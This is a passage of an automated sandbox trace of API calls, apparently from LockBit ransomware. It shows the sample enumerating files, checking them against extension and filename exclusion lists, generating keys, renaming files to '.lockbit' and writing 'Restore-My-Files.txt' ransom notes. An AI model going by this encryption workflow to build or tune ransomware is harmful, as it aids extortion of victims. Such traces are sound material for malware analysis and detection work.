lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.547] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.547] malloc (_Size=0xa6) returned 0x77d7a8 [0120.547] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.548] free (_Block=0x77d7a8) [0120.548] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\INDST_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.548] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.548] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.548] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d9b0900, ftCreationTime.dwHighDateTime=0x1bd6360, ftLastAccessTime.dwLowDateTime=0x562d5870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8d9b0900, ftLastWriteTime.dwHighDateTime=0x1bd6360, nFileSizeHigh=0x0, nFileSizeLow=0x4c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0075478.GIF", cAlternateFileName="")) returned 1 [0120.548] lstrcmpiW (lpString1=".", lpString2="J0075478.GIF") returned -1 [0120.548] lstrcmpiW (lpString1="..", lpString2="J0075478.GIF") returned -1 [0120.548] PathFindExtensionW (pszPath="J0075478.GIF") returned=".GIF" [0120.548] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0120.548] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0120.548] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0120.548] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0120.548] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0120.548] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0120.548] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0120.548] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0120.548] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0120.548] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0120.548] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0120.548] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0120.548] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0120.548] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0120.548] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0120.549] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0120.549] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0120.549] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0120.549] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0120.549] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0120.549] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0120.549] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0120.550] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0120.550] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0120.550] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0120.550] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0120.550] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0075478.GIF") returned 1 [0120.550] lstrcmpiW (lpString1="ntldr", lpString2="J0075478.GIF") returned 1 [0120.550] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0075478.GIF") returned 1 [0120.550] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0075478.GIF") returned -1 [0120.550] lstrcmpiW (lpString1="autorun.inf", lpString2="J0075478.GIF") returned -1 [0120.550] lstrcmpiW (lpString1="thumbs.db", lpString2="J0075478.GIF") returned 1 [0120.550] lstrcmpiW (lpString1="iconcache.db", lpString2="J0075478.GIF") returned -1 [0120.550] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.550] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF") returned=".GIF" [0120.550] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0120.550] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0120.550] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0120.550] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0120.550] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0120.550] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0120.550] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0120.550] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0120.550] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0120.550] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0120.550] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0120.550] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0120.550] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0120.550] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0120.551] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0120.551] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0120.551] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0120.551] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0120.551] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0120.551] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0120.551] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0120.551] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0120.551] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0120.551] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0120.551] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0120.551] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0120.551] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0120.551] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0120.551] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF.lockbit") returned 72 [0120.551] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0075478.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0120.554] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.554] malloc (_Size=0x40068) returned 0x3e70008 [0120.555] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=1220) returned 1 [0120.555] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.555] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0120.555] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.555] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0120.556] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0120.561] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.561] malloc (_Size=0xa6) returned 0x77d7a8 [0120.561] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.562] free (_Block=0x77d7a8) [0120.562] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0075478.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.562] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.562] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.562] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2606, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0086384.WMF", cAlternateFileName="")) returned 1 [0120.562] lstrcmpiW (lpString1=".", lpString2="J0086384.WMF") returned -1 [0120.562] lstrcmpiW (lpString1="..", lpString2="J0086384.WMF") returned -1 [0120.562] PathFindExtensionW (pszPath="J0086384.WMF") returned=".WMF" [0120.562] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.562] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.562] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.562] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.562] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.562] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.562] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.562] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.563] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.563] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0086384.WMF") returned 1 [0120.564] lstrcmpiW (lpString1="ntldr", lpString2="J0086384.WMF") returned 1 [0120.564] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0086384.WMF") returned 1 [0120.564] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0086384.WMF") returned -1 [0120.564] lstrcmpiW (lpString1="autorun.inf", lpString2="J0086384.WMF") returned -1 [0120.564] lstrcmpiW (lpString1="thumbs.db", lpString2="J0086384.WMF") returned 1 [0120.564] lstrcmpiW (lpString1="iconcache.db", lpString2="J0086384.WMF") returned -1 [0120.564] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.564] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF") returned=".WMF" [0120.564] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.564] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.564] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.565] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.565] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.565] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.565] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.565] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.565] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.565] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.565] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.565] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.565] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.565] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.565] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.565] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.565] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.565] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.565] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.565] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.565] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF.lockbit") returned 72 [0120.565] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086384.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0120.569] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.569] malloc (_Size=0x40068) returned 0x3df0008 [0120.569] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9734) returned 1 [0120.569] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.570] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0120.570] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.570] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0120.570] ReadFile (in: hFile=0x13c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0120.572] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.572] malloc (_Size=0xa6) returned 0x77d7a8 [0120.572] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.573] free (_Block=0x77d7a8) [0120.573] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086384.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.573] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.573] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.573] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x257c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0086420.WMF", cAlternateFileName="")) returned 1 [0120.573] lstrcmpiW (lpString1=".", lpString2="J0086420.WMF") returned -1 [0120.573] lstrcmpiW (lpString1="..", lpString2="J0086420.WMF") returned -1 [0120.573] PathFindExtensionW (pszPath="J0086420.WMF") returned=".WMF" [0120.573] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.573] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.573] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.573] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.573] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.573] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.574] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.574] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.575] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.575] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.575] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.575] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.575] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.575] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.575] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.575] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.575] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.575] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.575] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.575] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.575] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.575] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0086420.WMF") returned 1 [0120.575] lstrcmpiW (lpString1="ntldr", lpString2="J0086420.WMF") returned 1 [0120.575] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0086420.WMF") returned 1 [0120.575] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0086420.WMF") returned -1 [0120.575] lstrcmpiW (lpString1="autorun.inf", lpString2="J0086420.WMF") returned -1 [0120.575] lstrcmpiW (lpString1="thumbs.db", lpString2="J0086420.WMF") returned 1 [0120.575] lstrcmpiW (lpString1="iconcache.db", lpString2="J0086420.WMF") returned -1 [0120.575] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.575] PathFindExtensionW 